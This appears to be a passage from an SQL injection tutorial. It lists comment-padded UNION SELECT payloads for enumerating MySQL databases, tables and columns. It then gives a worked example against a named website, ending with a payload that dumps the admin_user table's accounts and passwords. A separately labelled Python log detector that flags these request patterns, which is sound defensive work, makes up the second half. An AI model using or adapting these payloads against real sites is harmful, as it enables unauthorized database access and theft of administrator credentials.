Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hexadecimal encoding of the database name yd_teamnet)
Dumping this way, the admin_user table appeared at the 4th result.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
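
A defender-side check for spotting the request shapes listed above in web server logs, added here as an example and not part of the original post: it URL-decodes the request target, replaces the /**/ comment padding with spaces, and flags UNION SELECT against information_schema, decoding hex-encoded schema and table names so an analyst sees what was targeted. The function names, paths and sample request targets are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# /* ... */ comments used instead of spaces, plus a trailing unterminated "/*".
_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
_UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b")
_SCHEMA = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b")
_HEXCMP = re.compile(r"\b(table_schema|table_name)\s*=\s*0x([0-9a-f]+)")

def normalize(target):
    """URL-decode, turn SQL comments into spaces, collapse whitespace, lowercase."""
    text = _COMMENT.sub(" ", unquote_plus(target))
    return re.sub(r"\s+", " ", text).lower()

def classify(target):
    """Report which injection markers a request target contains after normalization."""
    text = normalize(target)
    schema = _SCHEMA.search(text)
    hex_names = {}
    for column, digits in _HEXCMP.findall(text):
        if len(digits) % 2 == 0:  # only well-formed hex literals can be decoded
            hex_names[column] = bytes.fromhex(digits).decode("latin-1")
    return {
        "union_select": bool(_UNION.search(text)),
        "schema_view": schema.group(1) if schema else None,
        "hex_names": hex_names,
    }

def verdict(target):
    """'schema-enum' for metadata enumeration, 'union-extract' for other UNION reads."""
    result = classify(target)
    if not result["union_select"]:
        return None
    if result["schema_view"] or result["hex_names"]:
        return "schema-enum"
    return "union-extract"

SAMPLES = [  # constructed request targets, not taken from real logs
    "/content.php?id=13240",
    "/content.php?id=-1/**/union/**/select/**/1,TABLE_NAME,3/**/from/**/"
    "information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x79645F7465616D6E6574"
    "/**/limit/**/1,1",
    "/content.php?id=1%20UNION%20SELECT%201,concat(0x7c,ID,0x7c),3%20FROM%20admin_user/*",
    "/search.php?q=credit+union+members",  # benign use of the word "union"
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(verdict(sample), classify(sample)["hex_names"], sample[:60])
```

Matching on the normalized text is what defeats the comment padding and mixed-case keywords; a pattern applied to the raw log line would miss all three steps.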